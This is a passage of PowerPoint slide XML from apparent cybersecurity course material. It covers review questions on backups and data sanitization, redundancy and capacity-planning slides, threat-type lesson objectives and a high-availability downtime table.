          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F7A2D4C-B022-4FD2-7AC0-6BBFFEA44443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does configuration management support cybersecurity operations?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What technology are snapshots most commonly associated with?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or false? Backup media can be on site, but offline.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are advising a company about backup requirements for a few dozen application servers hosting tens of terabytes of data. The company requires online availability of short-term backups, plus off-site security media and long-term archive storage. The company cannot use a cloud solution. What type of on-premises storage solution is best suited to the requirement?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Define data sanitization.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40680001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1FB47-C667-737E-9463-C92EE86B6588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 7B - Redundancy Strategies</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5320DF38-9B50-5B4D-11EC-5026C73FD610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336872"/>
            <a:ext cx="10292479" cy="4241727"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redundancy strategies are essential to an organization’s disaster recovery and business continuity planning. These strategies include continuity of operations planning (COOP), which involves developing processes and procedures to ensure critical business functions can continue during and after a disruption. High availability (HA) clustering uses redundant systems that can automatically take over operations in case of a failure, minimizing downtime. Power redundancy ensures critical infrastructure, such as datacenters, has backup power sources to continue operations during an outage. Vendor diversity and defense in depth involve using multiple vendors and layers of security to reduce the risk of single points of failure and enhance overall redundancy. Regular testing, including tabletop exercises, failover tests, and simulations, is essential to identify vulnerabilities, evaluate response plans, and improve redundancy measures. By incorporating redundancy strategies, organizations can reduce risks, minimize downtime, and ensure the continuity of their critical business functions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Continuity of Operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Backups</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relationship to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Busines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Continuity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capacity Planning</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18438950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2C32-166B-3CE9-88EA-BE3794E716BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Capacity Planning Risks</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B325DD5-D2B4-2A40-0B06-D3DB87985A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>People Risks Associated with Capacity Planning</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People risks associated with capacity planning may include insufficient staffing or skills gaps, leading to inadequate resource allocation or ineffective utilization. Lack of cross-training or succession planning can create dependency on specific individuals, increasing vulnerability to disruptions. Additionally, resistance to change, lack of employee engagement, or ineffective communication can hinder successful security operations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-Training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remote Work Plans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Alternative Reporting Structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changes in Workforce Capacity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other Risks Associated with Poor Capacity Planning</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4236900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3B3FE-E4C3-D080-9558-634CFE44FEF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 2 - Compare Threat Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A864712-98BC-0D0E-1232-B677BEDD7755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare and contrast attributes and motivations of threat actor types.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain common threat vectors and attack surfaces.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340039046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1A78-78C1-0FBE-00A3-45029869AB6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>High Availability</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA8D495-4CFC-BFFF-EE9F-D26360D16620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3400124716"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="431656" y="2201736"/>
          <a:ext cx="4697411" cy="4603228"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1207734">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3588708829"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1547559">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3935809601"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1942118">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2494699926"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1130055">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="71755" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Nines</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-35" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="449580" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Availability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="469265" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Annual</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="50" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Downtime</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="469265" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>hh:mm:ss</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B060203050402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593891286"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="713122">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="71755" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-25" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Six</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="449580" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>99.9999%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="469265" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>00:00:32</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B060203050402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147533229"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="715010">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="71755" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-20">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Five</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="449580" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>99.999%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="469265" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>00:05:15</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B060203050402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738677417"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="715010">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="71755" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-20">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Four</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="449580" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>99.99%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="469265" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>00:52:34</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B060203050402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00989524"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="715010">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="71755" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Three</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="449580" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" spc="-10" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>99.9%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
